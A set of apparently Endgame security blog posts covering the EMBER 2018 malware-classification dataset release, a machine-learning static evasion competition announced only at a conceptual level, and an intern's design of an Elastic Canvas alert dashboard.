    We found that the test set in the original EMBER 2017 dataset release was very easy to classify. The benchmark model on this data was trained with default LightGBM parameters and still achieved a 0.999 area under a receiver operating characteristic (ROC) curve. So this time around, we selected PE files to include while keeping in mind that we wanted to make the classification task harder. The benchmark model trained on the EMBER 2018 files is now optimized by a simple parameter grid search, but it still only achieves a 0.996 area under a ROC curve. This is still excellent performance, but we’re hoping this leaves more room for innovative and improved classification techniques to be developed.

    Expanded and Updated Feature Set

    This latest release of EMBER contains a new feature set that we are calling feature set version 2. The main difference between this feature set and version 1 features is that we are now using LIEF version 0.9.0 instead of version 0.8.3. Feature calculations using the new version of LIEF are not guaranteed to be equivalent to those using the older version.

    Also, one of our goals for the features that we provided last year was that researchers could recreate decisions made by the Adobe Malware Classifier without going back to the original PE file. It turns out that the original features were insufficient to reproduce the original work. In version 2 of our feature set, the new data directory features now allow that analysis.

    Thanks to a clustering analysis carried out on the original EMBER release, we found that the distribution of some feature values was very uneven. The main culprits were samples that had a large number of ordinal imports, all of which were getting hashed to the exact same place. In order to smooth the feature space, ordinal imports are now hashed along with named imports in feature set version 2.

    After freezing the development of version 2 of our feature set, we calculated these new features for the original EMBER 2017 set of files. Those new features calculated on the old files are now publicly available for download in addition to the features from the new 2018 files.

    PE File Selection

    Clustering analysis of EMBER 2017 also revealed extreme outliers and PE files that had exactly the same feature vector. Although this sort of dirty data is expected in the real world by any deployed static malware classifier, we wanted our benchmark dataset to better capture performance across a normalized view of the set of PE files. For this reason, we used this outlier and duplicate detection to clean some of the worst offenders before finalizing our selection for the 2018 feature set.

    Adding an additional year of labels and features onto the original data release opens the door to more longitudinal studies of model performance degradation and malware family evolution. While these possibilities are exciting, they are complicated by the fact that different logic was used in each year to select the set of files that were included in the dataset. The malware and benign samples are not sampled identically from a single distribution.  Depending on the goal of the research, this difference may not matter. But researchers must be aware of this when forming and testing their hypotheses.

    It’s been inspiring to see all the interest in EMBER over the last year and a half. We’re hoping that this new release can further empower researchers to find new static classification techniques, quantify the performance of existing models, or simply to practice their data analysis skills. Please reach out if you have any questions or suggestions!
     

    [1] Understanding Model Degradation In Machine Learning Models 

    [2] Measure Twice, Quarantine Once: A Tale of Malware Labeling over Time

    [3] TreeHuggr: Discovering where tree-based classifiers are vulnerable to adversarial attack

    Machine Learning Static Evasion Competition


    As announced at DEFCON’s AIVillage, Endgame is co-sponsoring (with MRG-Effitas and VM-Ray) the Machine Learning Static Evasion Competition.  Contestants construct a white-box evasion attack with access to open source code for model inference and model parameters.  The challenge: modify fifty malicious binaries to evade up to three open source malware models.  The catch: the modified malware samples must retain their original functionality. The prize: the contestant/team to produce the most evasions and publish the winning solution will win an NVIDIA Titan RTX, a powerful and popular GPU for training deep learning models.

    Why this competition?

    Some may question why Endgame is sponsoring a competition that overtly encourages participants to evade endpoint security protections.  After all, Endgame’s MalwareScore™ is itself a static pre-execution antimalware engine built on machine learning (ML).  At Endgame, we have long espoused the view that there is no security by obscurity, and that self- and public testing are more than hygienic.  Discovering and publicly sharing the evasion strategies that capable contestants find is good for security.

    The competition is unrelated to the recent evasion of commercial ML endpoint protection software by security researchers.  Although CylancePROTECT® was the target of that bypass, one should keep in mind that, with enough work, any single protection component, ML or not, can be blatantly bypassed or carefully sidestepped.  This is why security products should adhere to a layered protection strategy: should an attacker sidestep one defense, there are a host of other traps set with a hair trigger.  

    In reality, the foundation for this competition began many years ago with Endgame adversarial machine learning research to create carefully-crafted malware perturbations that evade machine learning models.  

    In academic circles, adversarial machine learning has largely been confined to computer vision models, wherein image pixels are subtly modified to preserve human recognition while exploiting worst-case conditions of the model to achieve catastrophic miscategorizations.  With each new attack strategy also come proposals for making machine learning more robust against these attacks.

    But malware, as a structured input, is different from images.  It’s harder. It’s mathematically inconvenient. And as such, we want to draw interest to this unique adversarial model.  Simply put, even though Portable Executable (PE) files are a sequence of bytes in the same way an image is a sequence of pixels, they differ starkly: when you slightly change an image pixel, the “imagey-ness” is preserved, but when you modify a byte in a PE file, you may very well corrupt the file format or destroy the program’s functionality.  So, attackers must carefully constrain how they modify the PE byte stream. This point deserves to be highlighted to the academic community.

    Ultimately, defenders benefit by understanding the space of functionality-preserving mutations that an attacker might apply. In reality, attacker evasion techniques more often involve source code modifications or compile-time tweaks, but the model we present offers a useful framework for reasoning about PE modifications in the same way that academics reason about pixel perturbations.  The hope is that by exploring the space of adversarial perturbations, defender models can anticipate some part of the evasive repertoire of an adversary and build in robustness.

    A useful and fun game

    Contestants will attempt to evade three open source models.  MalConv is an end-to-end deep learning model.  The non-negative MalConv model has an identical structure to MalConv, but is constrained to have non-negative weights, which forces the model to look only for evidence of maliciousness rather than evidence of both malicious and benign byte sequences.   Both of these models are end-to-end deep learning models, upon which most of the recent adversarial machine learning literature has been focused. The recently updated EMBER LightGBM model is the third model, and operates on features extracted from an input binary.  Each of the models was trained on the EMBER 2018 hashes.

    It’s important to note that none of the models, as presented, are production-worthy models.  In particular, these are “naked” models (e.g., no whitelist/blacklist) trained on comparatively small datasets, and the thresholds have been adjusted to detect each of the competition malware samples.   Thus, the EMBER model has a false positive rate of less than 5:1000, while the deep learning models have false positive rates exceeding 1:2. Nevertheless, the models represent useful targets for exploring and understanding successful evasive techniques.

    A final word

    Even with the chance of evasion, machine learning models ostensibly offer excellent detection rates at low false positive rates for detecting malware before it executes.  Importantly, machine learning generalizes to new samples, evolving families, and polymorphic strains. Machine learning is much less brittle than signature-based approaches that memorize known threats but miss subtle perturbations to those same samples.  For this reason, machine learning has been an overwhelmingly positive development for information security.

    We thank our partners for the tremendous amount of work and resources they’ve contributed to make this a viable competition. Watch this space for competition results.

    Visualizing Security Data with Canvas


    As we have explored in prior blog posts, Endgame uses Elasticsearch as its main data store for its alerts and investigation workflows.  Moreover, a number of our customers and prospects rely on Elasticsearch to collect, analyze and visualize their security data. Last June, we announced the exciting news that Endgame entered into an acquisition agreement with Elastic. However, even prior to those discussions, it became clear that our customers would see significant value in being able to integrate their Endgame data into their instance of Elastic.  Endgame offers integrations into other SIEM and similar products (such as Splunk and ServiceNow), and we hope to make an Elastic Stack Integration (Beta) available to our customers in an upcoming release. With this feature, Endgame can stream all endpoints and events directly into a user’s Elastic Stack. This feature allows users to store and search Endgame data directly in Elastic and use the variety of applications offered by Elastic. 

    As this year’s Product Design Intern, I thought it would be a great opportunity to explore this feature for my summer project. I wanted to highlight one of Elastic’s applications, Canvas, and explore its capabilities using data streamed from Endgame. Canvas is an application that allows users to create highly customizable dashboards using real-time data. Compared to Elastic’s other visualization apps, Canvas’ built-in editing controls and powerful expression editor give users complete control to create useful and dynamic dashboards. This seemed like the perfect tool for me to use as a designer.

    With Black Hat in early August, I had only a few weeks to come up with a design idea, implement it, and have it presentation-ready for the conference.

    The Alert Dashboard

    Dashboards give a high-level overview of the overall health of an environment and provide the metrics for the reports that many security teams are required to produce. While current platform features like Reporting fulfill these needs, I decided to take this opportunity to improve upon our dashboards without the limitation of designing within the current Endgame platform. Since Elastic doesn’t currently have a way to visualize security alerts within their stack, I thought an alert dashboard would be a good place to start.

    Preparation

    The first step to creating an alert dashboard was gathering information to decide what to include. I referenced existing dashboards and reporting metrics we use to make this decision. I also had the opportunity to interview some of our actual users and gather their impressions. Through these discussions, I learned that managers were the ones who gained the most value from dashboards and wanted an overview of the health of their security environment.

    I used this research to decide what type of visualization matched the type of information users wanted to see. Afterwards, I created a rough template of how to organize these elements. With this preparation, I had a good sense of what I wanted the final dashboard to look like.

    An early dashboard template

    Design Process

    The first part of the design process was to parse through the data streamed into the Elastic Stack and create the metrics I wanted. Even with only a beginner’s background in SQL, it was relatively simple for me to compose queries for the metrics I wanted displayed. Elastic also has several introductory tutorials about Canvas that are helpful to those unfamiliar with SQL.

    A gif of a SQL statement being written to display live data
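
    For example, a simple "alerts by type" metric could be backed by a query along these lines. The index and column names here are hypothetical placeholders for whatever your streamed Endgame data contains:

    SELECT alert_type, COUNT(*) AS total
    FROM "endgame-alerts"
    GROUP BY alert_type
    ORDER BY total DESC

    Canvas runs the statement against Elasticsearch, and the result can be wired directly into a chart or table element.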

    After all the visualizations were made, the next step was the fun part: styling them! Canvas has several in-app controls to edit an element’s color palette, text styling, and more. However, for those who really want absolute customization, there’s an option to directly edit an element’s CSS stylesheet. I wanted to emulate the feel of the current Endgame platform, so I used Endgame branding and color choices throughout my design.

     

    A gif of the in-app style controls in use.

    The Finished Product

    Version one of the alert dashboard

    Version two of the alert dashboard

    After several iterations and helpful feedback from my co-workers, the alert dashboard was finished! I created two versions that contained similar visualizations with varying color palettes and organization. 

    Customization Capabilities 

    I created these dashboards to be displayed at the 2019 Black Hat conference earlier this month. They were one of the talking points of the Elastic Integration demo.

    A picture of the Canvas Dashboard presented at the Endgame booth at Black Hat

    However, while I created two versions of the alert dashboard for Black Hat, there are infinite possibilities for how the dashboard could look. One of the best parts of Canvas is its limitless customization capabilities. I came up with almost a dozen different layouts. Any of these dashboards would be great depending on how users want to visualize their information. For example, some users want as much information as possible and to see a detailed breakdown of each element. Others might want a general picture and only desire to see the highest level metrics and trends.

    Some of the many dashboard variations I created during this project 

    Next Steps

    It was an incredibly fun project to create a new alert dashboard from scratch. As a summer intern, it was awesome to see my dashboard prominently displayed at Black Hat. After exploring the Canvas application, I can say even those without a design or technical background are able to make visually striking dashboards with valuable data.

    If you’re interested in learning more about the Elastic Stack Integration (Beta), feel free to reach out here. Either way, this is an exciting look into the possibilities of what will come out of the Endgame and Elastic partnership, so look forward to what happens next!





